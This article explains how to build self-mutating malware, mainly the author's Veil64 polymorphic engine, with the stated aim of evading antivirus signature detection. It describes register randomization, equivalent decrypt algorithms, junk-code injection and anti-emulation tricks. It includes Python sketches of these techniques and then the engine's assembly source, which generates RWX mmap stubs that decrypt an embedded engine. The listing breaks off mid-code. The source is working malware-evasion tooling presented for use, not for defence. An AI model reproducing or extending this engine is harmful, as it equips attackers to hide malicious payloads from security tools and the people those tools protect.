Article Summary: This article systematically elaborates on the technical evolution and implementation principles of self-mutating malware, covering the core mechanisms of polymorphic and metamorphic engines. Through two concrete examples — Veil64 and Morpheus — the author, "f00crew" of Hong Kong, China, analyzes key techniques such as register randomization, algorithmic variants, and intelligent junk code injection. The article emphasizes how mutation at the syntactic, structural, and semantic layers can evade signature-based detection while strictly adhering to the principle of behavioral conservation. The author argues that the essence of mutation technology is to keep functionality unchanged while endlessly varying the implementation, and warns of risks such as code size inflation and stability issues.
Categories: Malware, Binary Security, Vulnerability Analysis, Red Teaming, Penetration Testing
The Art of Self-Mutating Malware
In the beginning, detection relied on signatures — a simple byte string that could uniquely identify a malicious sample. In that era, the process was straightforward: append the virus to the end of a file and patch the entry point. The AV industry quickly responded with signature databases, and for a period, the rhythm of this confrontation was predictable.
This article discusses how to implement self-mutating malicious code: how to build your own polymorphic engine, and some core ideas behind metamorphic code. For malicious code, self-mutation is one of the most elegant paths to solving the detection problem. You no longer just hide yourself — you become “another you” with every replication. This is the purest form of digital evolution.
The concepts we discuss do not depend on any specific implementation. Although the article uses real examples and practical principles from code I have written, the real value lies in understanding the underlying theory of “why mutation is feasible.”
Let’s go back to the beginning. Early VX practices were crude: they directly overwrote files and caused destruction. Some samples would first run the original program and then deliver their own payload. AV quickly caught up, mainly relying on signature scanning to catch samples.
The VX community evolved accordingly and began encrypting their code. The payload remained encrypted and was only unpacked at runtime. AV then turned its attention to the decryptor, so VX authors began dynamically transforming decryption routines. Some families even automatically rotated decryptors — this type later became known as oligomorphic.
Around 1985 to 1990, AV dominated with static signature scanning: string matching and fixed byte patterns made samples easy to hit once they landed on disk. By the early 1990s, the situation began to change. Virus bodies started to be encrypted, exposing only a decryption stub. This stub immediately became AV’s primary hunting target and spurred the development of wildcard and heuristic scanning.
Then polymorphic viruses appeared. The virus would automatically generate a new decryptor at creation time or during each infection. Each instance had its own encryption/decryption routine and evaded scanning by rearranging machine code. This became the defining feature of the 1990s: the same virus, infinite appearances. Dark Avenger's MtE engine, released in 1992, completely rewrote the rules of this game.
After that, metamorphic viruses emerged. They no longer relied on an encryption shell. They would rewrite the entire body with every infection. Code structure, control flow, and register usage would all change, but the payload remained unchanged. Between 2000 and 2005, metamorphic samples like Zmist and Simile raised the bar even higher: there was no fixed decryptor to track — only continuous code mutation.
Metamorphic code changes everything, not just the decryptor. It evolved from polymorphism but upgraded from “encryption camouflage” to “overall code reshaping.” Detection difficulty is extremely high; implementation difficulty is equally high, especially at the assembly level.
Overview
When it comes to self-modifying loaders, you have two paths. The first is to keep it small and aggressive: build a lightweight, fast loader that only performs “just enough” mutation — tweak a few places here, quickly shuffle a few there — to slip past scanners without triggering obvious alerts. The code remains compact and raw, but reliable enough.
The other path is full metamorphosis. The loader no longer just fine-tunes itself; it disassembles and rebuilds itself. Layouts are rearranged, instructions are scattered, and entirely new encryption is used on every run. Even if reverse engineers and AV capture one version, the next version will look like a completely unfamiliar sample.
This is not magic. Making it run stably after every mutation is extremely difficult. You must build in validation: count instructions, verify jumps, and perform sanity checks on every change — otherwise it will crash immediately. Even more troublesome is that code size can balloon out of control, eventually losing practicality.
Before discussing specific techniques, we must first clarify: when we talk about executable code, what does “mutation” really mean? It is not just “changing a few bytes,” but the relationship between “form and function,” and how far this relationship can be stretched without destroying behavior.
— The Essence of Identity —
What exactly makes a program “itself”? Is it the order of instructions? Register usage? Memory layout? Or something deeper, like intent?
Mutation’s answer is: identity does not lie in what the code looks like, but in what the code does. As long as two binaries produce the same output for the same input, they are functionally equivalent — even if their assembly is completely different.
Version A:            Version B:            Version C:
mov eax, 0            xor eax, eax          sub eax, eax
inc ebx               add ebx, 1            lea ebx, [ebx+1]

Bytes:                Bytes:                Bytes:
B8 00 00 00 00        31 C0                 29 C0
43                    83 C3 01              8D 5B 01
Three completely different byte patterns that produce identical behavior. This was my “eureka moment” and the starting point for all subsequent implementations.
The core insight is: a program’s identity is not its bytes, but its behavior. If I can generate infinitely many patterns that keep behavior unchanged while making bytes different, signature-based detection will be continuously undermined.
But this also raises harder questions:
- How to systematically generate equivalent code?
- How to guarantee correctness across mutations?
- How to make variants truly unpredictable?
These three questions directly shaped the design of my two engines. They explore different paths to “mutation,” and we call them Veil64 and Morpheus.
Veil64 is a polymorphic code generator used to produce infinite variants of decryption routines: same functionality, infinite forms. Morpheus is a file infector that truly rewrites its own code during execution.
This is the core idea. Everything else is built on top of it: if you cannot hide what is done, then make how it is done unpredictable.
Signatures are the byte patterns that AV focuses on tracking — the “high-risk” digital footprints. Strings, code fragments, hashes — anything that can mark malware will be used. Encryption is a key technique here: it scrambles these recognizable markers, making it difficult for AV to hit them.
Then there is the payload, the part that actually executes the malicious logic. It usually does not run alone but is bound to a stub. This small module decrypts and launches the payload in memory. Because the payload itself is encrypted, AV has difficulty hitting it statically and instead targets the stub. The advantage is that the stub is small and easy to continuously mutate, allowing it to constantly bypass old rules.
This turns the confrontation into a “one-to-many” game, and this mathematical relationship naturally favors the mutation side. Each new variant has a chance to break old detection rules, burn old signatures, and continue to lurk.
“What starts as polymorphic finishes as metamorphic.”
— Levels of Mutation —
Mutation is not just surface-level change — it occurs across layers, including syntactic, structural, and semantic reconstruction.
First, syntactic mutation (grammar-level mutation). This is the outermost layer: replacing equivalent instructions, randomizing register usage, and reordering operations. Appearance changes, result remains the same.
Original: mov eax, [ebx+4]
Mutated: push ebx
add ebx, 4
mov eax, [ebx]
sub ebx, 4
pop ebx
Both snippets load the value at [ebx+4] into eax, but the instruction paths are completely different.
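To make the substitution idea concrete, here is an illustrative Python sketch, not part of Veil64, of how an engine can table equivalent encodings for one operation and pick among them at random. The byte sequences are standard x86-64 encodings for zeroing RAX (their flag effects differ slightly, which a careful engine must account for):

```python
import random

# Four semantically equivalent ways to set RAX to zero, as raw bytes.
ZERO_RAX = [
    bytes([0x48, 0x31, 0xC0]),               # xor rax, rax
    bytes([0x48, 0x29, 0xC0]),               # sub rax, rax
    bytes([0x48, 0xC7, 0xC0, 0, 0, 0, 0]),   # mov rax, 0
    bytes([0x48, 0x83, 0xE0, 0x00]),         # and rax, 0
]

def emit_zero_rax(rng: random.Random) -> bytes:
    """Same effect on RAX every time, different bytes most of the time."""
    return rng.choice(ZERO_RAX)
```

Scale this table across every common operation and the number of byte-level spellings of one routine multiplies quickly.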
Deeper is structural mutation (structure-level mutation). The change is more profound: reconnecting control flow, rewriting data structures, or even replacing entire algorithms with “different paths but equivalent results.”
The deepest is semantic mutation (semantic-level mutation). It splits functions and reorganizes logic into behaviorally equivalent bodies while ensuring the original intent remains unchanged.
— The Conservation Principle —
No matter how aggressive the mutation, there is one non-negotiable constraint: the program’s semantic behavior must be preserved. What is done (functional output) must remain unchanged; only how it is done (internal implementation mechanism) can change.
The genotype (underlying code structure) can freely drift, mutate, and be obfuscated; the phenotype (externally observable behavior) must remain constant. All mutation techniques can only operate within this boundary.
Naive Approaches
Polymorphism is the purest form of mutation. It essentially expresses the same thing in a thousand different ways. Like a chameleon with a clear goal: core behavior is locked, while everything else continuously changes. No fixed identity, only endless variants.
My first serious attempt to break signature detection was Veil64: a polymorphic code generator capable of generating infinite different ways to write the same decryption logic. The goal was simple: encrypt the payload differently every time and ensure the decryptor never appears the same twice.
— Core Challenges —
Constructing code that decrypts correctly every time yet never looks the same twice is non-trivial. Every generated routine must be compact, fast, and clean, must leave no obvious patterns, and must resist both static and dynamic analysis.
I started with a simple two-stage design, and understanding this split is key to why it works. The first layer is the stub: a minimal piece of code responsible for memory allocation and decrypting the embedded engine. The second layer is the engine itself: the polymorphic decryptor that actually handles the payload.
┌─────────────────┐
│ Stub Code │ (119-200 bytes)
├─────────────────┤
│ Encrypted Engine│ (176-300 bytes)
├─────────────────┤
│ Padding │
└─────────────────┘
Why use two stages? Because this allows the polymorphic engine itself to be encrypted. The stub is small and simple, so even with variants, the signature surface is limited. The real polymorphic power resides in the engine. By encrypting the engine and embedding it inside the stub, complex and variable code is hidden until runtime.
The overall flow is as follows: you call genrat() with a buffer, size, and seed key. The engine first generates a runtime key using multiple entropy sources: RDTSC provides hardware timing, stack pointer provides process differences, and RIP provides position-related randomness. It then builds the polymorphic engine, including random register allocation, selection among four algorithmic variants, and intelligent junk code injection.
Next comes the stub generation stage. Multiple mmap syscall initialization variants are generated, RIP-relative addressing is handled for position independence, and the encrypted engine is embedded. Finally, everything is encrypted and assembled into executable code.
The clever part is that the stub and engine change independently. Even if someone creates a signature for a stub variant, the internal encrypted engine is different every time. Even if they manage to extract and analyze the engine, the next generation will use a completely different set of registers and algorithms.
— The Four Pillars of Polymorphism —
Never use the same set of registers twice.
Hard-coded registers are signature bait. If your decryptor always uses EAX as a counter and EBX as a data pointer, you are practically exposing yourself. Such patterns will be quickly flagged, so the engine randomizes register usage on every generation.
But this is not random grabbing. The selection process avoids conflicts, skips RSP to prevent stack corruption, and ensures no register takes on multiple roles. The underlying logic looks roughly like this:
get_rr:
call next_random
and rax, 7
cmp al, REG_RSP ; Never use stack pointer
je get_rr
cmp al, REG_RAX ; Avoid RAX conflicts
je get_rr
mov [rel reg_base], al ; Store base register
.retry_count:
call next_random
and rax, 7
cmp al, REG_RSP
je .retry_count
cmp al, [rel reg_base] ; Ensure no conflicts
je .retry_count
mov [rel reg_count], al
This process is repeated for key registers and all registers used in junk code. Even before considering algorithms and junk injection, there are already 210 possible register combinations. That means the same register-level operation can have 210 different appearances — all completely distinct to a signature scanner.
One variant might use RBX for data, RCX for counting, and RDX for the key. The next might switch to RSI for data, RDI for counting, and RBX for the key. Yet another could use extended registers R8, R9, R10. Every combination is functionally equivalent, but the opcode patterns are completely different.
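In higher-level pseudocode, get_rr's rejection sampling looks like the following Python sketch (illustrative; like the engine, it skips RSP and keeps RAX free as scratch):

```python
import random

RAX, RSP = 0, 4  # x86-64 register encodings, as in the %define table

def pick_registers(rng: random.Random):
    """Choose three distinct registers for the data/counter/key roles,
    retrying on RSP, RAX, or any register already taken."""
    taken = {RSP, RAX}
    roles = []
    while len(roles) < 3:
        r = rng.randrange(8)   # 'and rax, 7' in the assembly
        if r in taken:
            continue           # conflict: retry, like .retry_count
        taken.add(r)
        roles.append(r)
    return tuple(roles)        # (data, counter, key)
```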
— Four Ways to Say the Same Thing —
Register randomization is only the starting point. True depth comes from algorithmic polymorphism. We do not fix a single decryption flow but cycle between four equivalent algorithms: same output, completely different instruction streams.
This is not simply swapping XOR for ADD. Each variant is carefully designed to guarantee correctness while maximizing signature dispersion.
- Algorithm 0: ADD → ROL → XOR
- Algorithm 1: XOR → ROL → XOR
- Algorithm 2: SUB → ROR → XOR
- Algorithm 3: XOR → ADD → XOR
All four algorithms produce identical final results, but their instruction sequences and opcode patterns are entirely different.
Each algorithm has a corresponding inverse process in the encryption phase. For example, if encryption uses XOR → ROR → SUB, decryption uses ADD → ROL → XOR. Mathematically they cancel perfectly, but the instruction flows never look the same. Opcode patterns, instruction lengths, and register usage all change. To a signature scanner, they appear as completely different routines.
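The pairing is easy to check in miniature. The following Python sketch, with arbitrary key bytes rather than Veil64's real key schedule, implements all four decrypt chains per byte together with the encrypt chains that invert them; every pair round-trips over the full byte range:

```python
def rol8(b, n):
    n &= 7
    return ((b << n) | (b >> (8 - n))) & 0xFF

def ror8(b, n):
    n &= 7
    return ((b >> n) | (b << (8 - n))) & 0xFF

# Decrypt chains (as listed above) and their inverses, applied per byte;
# k1, k2 are key bytes, r is a rotate count (reused as the ADD constant in #3).
def dec0(b, k1, k2, r): return rol8((b + k1) & 0xFF, r) ^ k2   # ADD-ROL-XOR
def enc0(b, k1, k2, r): return (ror8(b ^ k2, r) - k1) & 0xFF

def dec1(b, k1, k2, r): return rol8(b ^ k1, r) ^ k2            # XOR-ROL-XOR
def enc1(b, k1, k2, r): return ror8(b ^ k2, r) ^ k1

def dec2(b, k1, k2, r): return ror8((b - k1) & 0xFF, r) ^ k2   # SUB-ROR-XOR
def enc2(b, k1, k2, r): return (rol8(b ^ k2, r) + k1) & 0xFF

def dec3(b, k1, k2, r): return (((b ^ k1) + r) & 0xFF) ^ k2    # XOR-ADD-XOR
def enc3(b, k1, k2, r): return (((b ^ k2) - r) & 0xFF) ^ k1
```

Each enc applies the inverse operations in reverse order, which is exactly why the decryptors can look nothing alike while cancelling perfectly.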
— Intelligent Junk Code —
Most polymorphic engines fail here: they either stuff in random bytes or pile on obvious NOP sleds, practically shouting “I’m malware.” That is amateur work. True polymorphism uses “intentional-looking” junk code that blends into the context and mimics normal compiler output.
Junk injection is not purely random — it is structured. It uses no-net-effect PUSH/POP pairs that look like register preservation, XOR reg, reg to imitate common zeroing initialization, and MOV reg, reg that resembles typical compiler register shuffling.
This is just a very basic example. Some engines do it more aggressively. The key point is to make it look like real developer code. PUSH RAX followed by POP RBX can masquerade as register saving and transfer; XOR RAX, RAX looks like legitimate initialization; MOV RAX, RAX resembles dead code left by an optimizer. Functionally they add no value, but visually they blend in.
Junk injection also deliberately varies in density: sometimes heavy, sometimes sparse; sometimes clumped, sometimes scattered in loops. There is no fixed “junk zone” that can be isolated — only code that looks normal every single time.
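Reduced to pseudocode, the junk emitter is a random choice over a small table of byte sequences. This Python sketch mirrors the stub_trash routine in the source below (note that xor rax, rax genuinely zeroes RAX, so that shape is only safe where RAX is dead, as it is in the stub):

```python
import random

# The four junk shapes stub_trash emits, as raw x86-64 bytes.
JUNK = [
    bytes([0x90]),               # nop
    bytes([0x50, 0x58]),         # push rax / pop rax (net no-op)
    bytes([0x48, 0x31, 0xC0]),   # xor rax, rax (looks like initialization)
    bytes([0x48, 0x89, 0xC0]),   # mov rax, rax (looks like compiler residue)
]

def emit_junk(rng: random.Random) -> bytes:
    """Emit 0-7 junk instructions of randomly mixed shape and density."""
    out = bytearray()
    for _ in range(rng.randrange(8)):   # 'and rax, 7' in the assembly
        out += rng.choice(JUNK)
    return bytes(out)
```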
— Breaking Linear Analysis —
Static analysis relies on linear flow: traversing code, building graphs, and extracting patterns. So we break it. Random jumps are inserted to skip over junk regions, directly destroying straight-line logic.
Jump generation is subtle. Sometimes 2-byte short jumps, sometimes 5-byte long jumps; they may skip only 1 byte or over a dozen. The skipped junk content is randomized every time. Even if the analyzer follows the jump path, its rhythm is disrupted on every run.
This produces unpredictable control flow and interferes with both static and dynamic analysis. Static tools face non-linear instruction streams mixed with random data; dynamic tools encounter different execution paths on every run, making it difficult to build a stable behavioral profile.
These jumps also serve a dual purpose: they mimic compiler output. Real compiled code is full of branches, jumps, and irregular flow. Injecting our own jumps increases this “natural complexity,” helping the code blend more seamlessly.
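A minimal Python sketch of the jump-over-junk trick (illustrative; the real engine also alternates between 2-byte short and 5-byte long jump forms):

```python
import random

def emit_jump_over_junk(rng: random.Random) -> bytes:
    """Emit 'jmp short +n' (EB nn) followed by n random filler bytes.
    Execution hops over the filler; a linear disassembler trips on it."""
    n = rng.randrange(1, 16)                             # skip 1-15 bytes
    filler = bytes(rng.randrange(256) for _ in range(n))
    return bytes([0xEB, n]) + filler
```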
— The Entropy Problem —
Hard-coded keys or constants are traps. I learned this the hard way: early versions embedded the constant 0xDEADBEEF in every variant. No matter how much the rest of the code changed, that fixed value instantly became a red flag.
The solution is runtime key generation: no fixed constants, no repetition, no patterns to pin down. The key is reconstructed on every execution, drawing from multiple entropy sources that vary across runs, processes, and machines.
Entropy comes from multiple sources. RDTSC provides cycle-granularity hardware timing; the stack pointer changes with processes and function calls; RIP brings position-related randomness under ASLR; the user key introduces input-driven variation.
The real strength lies in how these values are combined. It is not simple XOR, but involves rotations, complements, and mixing with stack-related values. Each transformation step depends on the current state, forming a dependency chain that ultimately produces a truly unpredictable key.
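A rough Python model of that dependency chain (the rotate counts loosely follow gen_runtm in the source below; tsc, sp, and rip here are plain parameters standing in for the real RDTSC, RSP, and RIP reads):

```python
MASK64 = (1 << 64) - 1

def rol64(x, n):
    n &= 63
    return ((x << n) | (x >> (64 - n))) & MASK64

def derive_key(tsc, sp, rip, user_key):
    """Mix the entropy sources so each step depends on the previous state:
    rotates, a derived constant, an addition, and a complemented XOR."""
    x = (tsc ^ user_key ^ sp) & MASK64
    x = rol64(x ^ rip, 13)
    const = rol64(x, 64 - 19) ^ sp        # ror 19 expressed as rol 45
    x = (x + const) & MASK64
    x ^= (~rol64(x, 7)) & MASK64          # complement-and-mix step
    return x
```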
— Randomness Is Critical —
Excellent polymorphic capability depends on high-quality randomness. Many engines use basic linear congruential generators or simple incrementing counters — both easily produce predictable patterns that can be flagged. I prefer the XorShift PRNG: fast, long period (2^64−1), and passes strong statistical randomness tests without repeating for a very long time.
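The next_random routine in the source below is a 64-bit xorshift step with the shift triple (13, 17, 5); one step in Python:

```python
MASK64 = (1 << 64) - 1

def xorshift64(state: int) -> int:
    """One xorshift step, mirroring next_random: <<13, >>17, <<5."""
    state ^= (state << 13) & MASK64
    state ^= state >> 17
    state ^= (state << 5) & MASK64
    return state & MASK64
```

Because every step is an invertible linear map over the state bits, a nonzero seed can never collapse to zero.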
Under ASLR, code is loaded at different addresses each time. Hard-coded absolute addresses will cause the polymorphic decryptor to fail if it lands in an unexpected location. The solution is RIP-relative addressing, with offsets calculated based on the current instruction pointer.
— Just-in-Time Machine Code Generation —
This is where we reach the real core. You cannot simply rearrange pre-written assembly and call it polymorphic. The engine generates raw x64 machine code on the fly, building every instruction byte by byte. Opcodes and operands are computed dynamically based on the current register allocation and algorithm choice.
The ModRM byte is especially critical in x64: it encodes which registers are used. By calculating this byte dynamically, the engine can implement the same operation with any register combination, producing different bytes — and therefore different signatures.
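For register-direct forms, that calculation is one OR expression. A Python sketch covering the classic registers (extended registers R8-R15 additionally need REX.R/REX.B bits, omitted here for brevity):

```python
# Register encodings (low 3 bits), matching the %define table in the source.
RAX, RCX, RDX, RBX, RSP, RBP, RSI, RDI = range(8)

def encode_rr(opcode: int, reg: int, rm: int) -> bytes:
    """REX.W + opcode + ModRM for a 64-bit register-to-register op.
    mod=11 selects register-direct; reg and rm pick the operands."""
    modrm = 0xC0 | (reg << 3) | rm
    return bytes([0x48, opcode, modrm])

# 0x31 = XOR r/m64,r64   0x89 = MOV r/m64,r64   0x01 = ADD r/m64,r64
```

encode_rr(0x31, RAX, RAX) yields 48 31 C0, the familiar xor rax, rax; swapping in different registers changes the ModRM byte, and with it the signature.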
The same polymorphic thinking applies to all syscall parameters. Multiple construction methods are used to avoid pattern matching.
— Performance and Scalability —
Basic generation averages 9 to 13 milliseconds per variant, which works out to roughly 4,600 to 6,600 variants per minute — more than enough to outpace signature updates. Speed is not higher because each variant undergoes register renaming, flow randomization, intelligent junk injection, and anti-debug checks.
Generation time fluctuates by ±3 to 4 ms by design to avoid predictability; stable timing would aid detection. The engine maintains this jitter by varying instruction order, junk block size, and encryption rounds.
Static memory footprint is approximately 340 to 348 KB — far larger than toy 4 KB engines. This includes precomputed transformation tables, runtime mutation logic, and anti-emulation traps. Per-variant memory usage remains stable with no leaks or growth.
Code size fluctuates between 180 bytes and 1.2 KB. Compact variants favor speed; balanced variants strike a compromise; complex variants maximize complexity to stress AV engines.
— What Variants Look Like —
Variant #1: Size 335, Key 0x4A4BDC5C3AEAC0AD
48 C7 C0 0A 00 00 00 mov rax, 10
48 FF C8 dec rax
50 push rax
58 pop rax
90 nop
48 31 FF xor rdi, rdi
...
Variant #2: Size 368, Key 0x6BAAA583D73FA32B
50 push rax
58 pop rax
50 push rax
58 pop rax
48 31 C0 xor rax, rax
48 83 C0 09 add rax, 9
...
Variant #3: Size 385, Key 0x5C3F1EDF85C0D55E
90 nop
90 nop
50 push rax
58 pop rax
48 C7 C0 09 00 00 00 mov rax, 9
...
Look at the differences. Variant #1 sets RAX by loading 10 then decrementing. Variant #2 uses PUSH/POP junk first, then XOR/ADD. Variant #3 starts with NOPs, inserts another set of junk, then loads directly. The result is the same (RAX = 9), but the method is completely different.
These three samples happen to differ by only 50 bytes, but the real spread is far wider: depending on the intensity of junk injection and obfuscation, the engine can produce anything from compact 180-byte variants to large 1200-byte ones.
The engine classifies variants into three categories by structure and complexity. Compact types (≈295–350 bytes) minimize junk and prioritize speed; balanced types (up to 400 bytes) compromise between obfuscation and stability; complex types (up to 500 bytes) layer more polymorphic techniques and anti-analysis features.
With four algorithms combined with 210 register permutations, there are already 840 base variants before adding junk and control-flow obfuscation. Introducing variable junk injection, diverse jump patterns, and multiple stub initialization methods expands the variant space into the millions.
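The 210 figure is the count of ordered picks of 3 distinct registers from the 7 general registers left after excluding RSP, and the 840 follows directly; checking the arithmetic in Python:

```python
from math import perm

register_orderings = perm(7, 3)         # 7 * 6 * 5 = 210 ordered role assignments
base_variants = 4 * register_orderings  # four algorithms per register layout
```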
The key is not just quantity, but “functional equivalence + signature diversity.” Every variant can correctly decrypt the payload, yet appears distinctly different from a signature-detection perspective.
Effective polymorphism maximizes signature diversity without degrading correctness. Generating billions of variants is meaningless if many are broken or still share detectable patterns. Correctness and diversity scale must hold simultaneously.
— Built-in Anti-Analysis Design —
Emulation engines usually struggle with variable timing, and junk code injection creates unpredictable execution durations. Key generation dependent on stack state makes the same variant behave differently across process contexts. Reliance on hardware timestamps further increases emulation cost because it requires accurate RDTSC simulation.
With no fixed constants or strings, static analysis tools struggle because there are almost no grep-able or fingerprintable anchors. Polymorphic control flow breaks linear analysis, while the encrypted embedded engine hides core logic until runtime.
Dynamic analysis is also disrupted by “legitimate-looking, functionally neutral” junk code. Multiple execution paths generate different behavioral traces on every run. Runtime key derivation ensures each execution has a unique key, making results difficult to reuse even if tracing succeeds.
Anti-analysis features are not optional — they are part of the system. Every polymorphic technique serves two purposes simultaneously: evading signatures and increasing analysis cost.
Veil64 Full Source Code
;------------------------------------------------------------
; [ V E I L 6 4 ]
;------------------------------------------------------------
; Type: Polymorphic Engine / Stub Generator
; Platform: x86_64 Linux
; Size: ~4KB Engine + Custom Stub
; Runtime shellcode obfuscation, encryption,
; and stealth execution via mmap + RIP tricks.
;
; 0xf00sec
;------------------------------------------------------------
section .text
global genrat
global exec_c
global _start
; x64 opcodes
%define PUSH_REG 0x50
%define POP_REG 0x58
%define ADD_MEM_REG 0x01
%define ADD_REG_IMM8 0x83
%define ROL_MEM_IMM 0xC1
%define XOR_MEM_REG 0x31
%define TEST_REG_REG 0x85
%define JNZ_SHORT 0x75
%define JZ_SHORT 0x74
%define CALL_REL32 0xE8
%define JMP_REL32 0xE9
%define JMP_SHORT 0xEB
%define RET_OPCODE 0xC3
%define NOP_OPCODE 0x90
%define JNZ_LONG 0x850F ; bytes 0F 85, swapped for little-endian stosw
%define FNINIT_OPCODE 0xE3DB ; bytes DB E3, swapped for stosw
%define FNOP_OPCODE 0xD0D9 ; bytes D9 D0, swapped for stosw
; register encoding
%define REG_RAX 0
%define REG_RCX 1
%define REG_RDX 2
%define REG_RBX 3
%define REG_RSP 4
%define REG_RBP 5
%define REG_RSI 6
%define REG_RDI 7
section .data
stub_key: dq 0xDEADBEEF ; placeholder, overwritten by gen_runtm
sec_key: dq 0x00000000
engine_size: dq 0
dcr_eng: dq 0
stub_sz: dq 0
sz: dq 0
seed: dq 0 ; PRNG state
p_entry: dq 0 ; output buffer
key: dq 0 ; user key
reg_base: db 0 ; selected registers
reg_count: db 0
reg_key: db 0
junk_reg1: db 0 ; junk registers
junk_reg2: db 0
junk_reg3: db 0
prolog_set: db 0
fpu_set: db 0
jmp_back: dq 0
alg0_dcr: db 0 ; algorithm selector
align 16
entry:
times 4096 db 0 ; engine storage
exit:
section .text
; main generator entry point
genrat:
push rbp
mov rbp, rsp
sub rsp, 64
push rbx
push r12
push r13
push r14
push r15
test rdi, rdi ; validate params
jz .r_exit
test rsi, rsi
jz .r_exit
cmp rsi, 1024 ; min buffer size
jb .r_exit
mov [rel p_entry], rdi
mov [rel sz], rsi
mov [rel key], rdx
call gen_runtm ; generate runtime keys
lea rdi, [rel entry]
mov r12, rdi
call gen_reng ; build engine
mov rax, rdi ; calculate engine size
sub rax, r12
mov [rel engine_size], rax
mov rdi, [rel p_entry]
call unpack_stub ; build stub
call enc_bin ; encrypt payload
mov rax, [rel stub_sz] ; total
test rax, rax
jnz .calc_sz
mov rax, rdi
sub rax, [rel p_entry]
.calc_sz:
pop r15
pop r14
pop r13
pop r12
pop rbx
add rsp, 64
pop rbp
ret
.r_exit:
xor rax, rax
pop r15
pop r14
pop r13
pop r12
pop rbx
add rsp, 64
pop rbp
ret
; generate engine
gen_reng:
push rdi
push rsi
push rcx
rdtsc
xor rax, [rel key]
mov rbx, 0x5DEECE66D
xor rax, rbx
mov rbx, rax
shl rbx, 13
xor rax, rbx
mov rbx, rax
shr rbx, 17
xor rax, rbx
mov rbx, rax
shl rbx, 5
xor rax, rbx
xor rax, rsp
mov [rel seed], rax
push rdi ; clear state
lea rdi, [rel reg_base]
mov rcx, 16
xor rax, rax
rep stosb
pop rdi
pop rcx
pop rsi
pop rdi
call get_rr ; select random registers
call set_al ; pick decrypt algorithm
call gen_p ; generate prologue
call yes_no ; random junk insertion
test rax, rax
jz .skip_pr
call gen_trash
.skip_pr:
call trash
call yes_no
test rax, rax
jz .skip_dummy
call gen_dummy
.skip_dummy:
call gen_dec ; main decrypt loop
call yes_no
test rax, rax
jz .skip_prc
call gen_trash
.skip_prc:
mov al, RET_OPCODE
stosb
cmp qword [rel jmp_back], 0 ; conditional jump back
je .skip_jmp
mov ax, JNZ_LONG
stosw
mov rax, [rel jmp_back]
sub rax, rdi
sub rax, 4
stosd
.skip_jmp:
call trash
mov al, RET_OPCODE
stosb
ret
; encrypt generated engine
enc_bin:
push rdi
push rsi
push rcx
push rax
push rbx
lea rdi, [rel entry]
mov rcx, [rel engine_size]
; validate engine size
test rcx, rcx
jz .enc_done
cmp rcx, 4096
ja .enc_done
cmp rcx, 10
jb .enc_done
; encrypt in place
mov rax, [rel stub_key]
mov rsi, rcx
.enc_loop:
test rsi, rsi
jz .enc_done
xor byte [rdi], al
rol rax, 7
inc rdi
dec rsi
jmp .enc_loop
.enc_done:
pop rbx
pop rax
pop rcx
pop rsi
pop rdi
ret
; build stub wrapper
unpack_stub:
push rbx
push rcx
push rdx
push r12
mov r12, rdi
call bf_boo ; bounds check
jae .stub_flow
call stub_trash
call gen_stub_mmap
call stub_decrypt
mov rax, rdi
sub rax, r12
mov [rel stub_sz], rax
call stub_trash
; update size after junk
mov rax, rdi
sub rax, r12
; check space for encrypted engine
mov rbx, rax
add rax, [rel engine_size]
cmp rax, [rel sz]
ja .stub_flow
; embed encrypted engine
lea rsi, [rel entry]
mov rcx, [rel engine_size]
test rcx, rcx
jz .skip_embed
rep movsb
.skip_embed:
; final size calculation
mov rax, rdi
sub rax, r12
mov [rel stub_sz], rax
pop r12
pop rdx
pop rcx
pop rbx
ret
.stub_flow:
xor rax, rax
mov [rel stub_sz], rax
pop r12
pop rdx
pop rcx
pop rbx
ret
; generate stub junk
stub_trash:
call next_random
and rax, 7 ; 0-7 junk instructions
mov rcx, rax
test rcx, rcx
jz .no_garbage
.trash_loop:
call next_random
and rax, 3 ; choose junk type
cmp al, 0
je .gen_nop
cmp al, 1
je .gen_push_pop
cmp al, 2
je .gen_xor_self
jmp .gen_mov_reg
.gen_nop:
mov al, 0x90
stosb
jmp .next_garbage
.gen_push_pop:
mov al, 0x50 ; push rax
stosb
mov al, 0x58 ; pop rax
stosb
jmp .next_garbage
.gen_xor_self:
mov al, 0x48 ; rex.w
stosb
mov al, 0x31 ; xor rax,rax
stosb
mov al, 0xC0
stosb
jmp .next_garbage
.gen_mov_reg:
mov al, 0x48 ; rex.w
stosb
mov al, 0x89 ; mov rax,rax
stosb
mov al, 0xC0
stosb
.next_garbage:
loop .trash_loop
.no_garbage:
ret
; generate mmap syscall stub
gen_stub_mmap:
; mmap setup
call next_random
and rax, 3 ; choose method
cmp al, 0
je .mmap_method_0
cmp al, 1
je .mmap_method_1
cmp al, 2
je .mmap_method_2
jmp .mmap_method_3
.mmap_method_0:
; mov rax, 9
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC0
stosb
mov eax, 9 ; mmap syscall
stosd
jmp .mm_continue
.mmap_method_1:
; xor rax,rax; add rax,9
mov al, 0x48
stosb
mov al, 0x31
stosb
mov al, 0xC0
stosb
mov al, 0x48
stosb
mov al, 0x83
stosb
mov al, 0xC0
stosb
mov al, 9
stosb
jmp .mm_continue
.mmap_method_2:
; mov rax,10; dec rax
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC0
stosb
mov eax, 10
stosd
mov al, 0x48
stosb
mov al, 0xFF
stosb
mov al, 0xC8
stosb
jmp .mm_continue
.mmap_method_3:
; mov rax,18; shr rax,1
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC0
stosb
mov eax, 18
stosd
mov al, 0x48
stosb
mov al, 0xD1
stosb
mov al, 0xE8
stosb
.mm_continue:
call stub_trash
; rdi setup
call next_random
and rax, 1
test rax, rax
jz .rdi_method_0
; mov rdi,0
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC7
stosb
mov eax, 0
stosd
jmp .rdi_done
.rdi_method_0:
; xor rdi,rdi
mov al, 0x48
stosb
mov al, 0x31
stosb
mov al, 0xFF
stosb
.rdi_done:
; mov rsi,4096
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC6
stosb
mov eax, 4096
stosd
; mov rdx,7 (rwx)
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC2
stosb
mov eax, 7
stosd
; mov r10,0x22 (private|anon)
mov al, 0x49
stosb
mov al, 0xC7
stosb
mov al, 0xC2
stosb
mov eax, 0x22
stosd
; mov r8,-1
mov al, 0x49
stosb
mov al, 0xC7
stosb
mov al, 0xC0
stosb
mov eax, 0xFFFFFFFF
stosd
; mov r9,0
mov al, 0x4D
stosb
mov al, 0x31
stosb
mov al, 0xC9
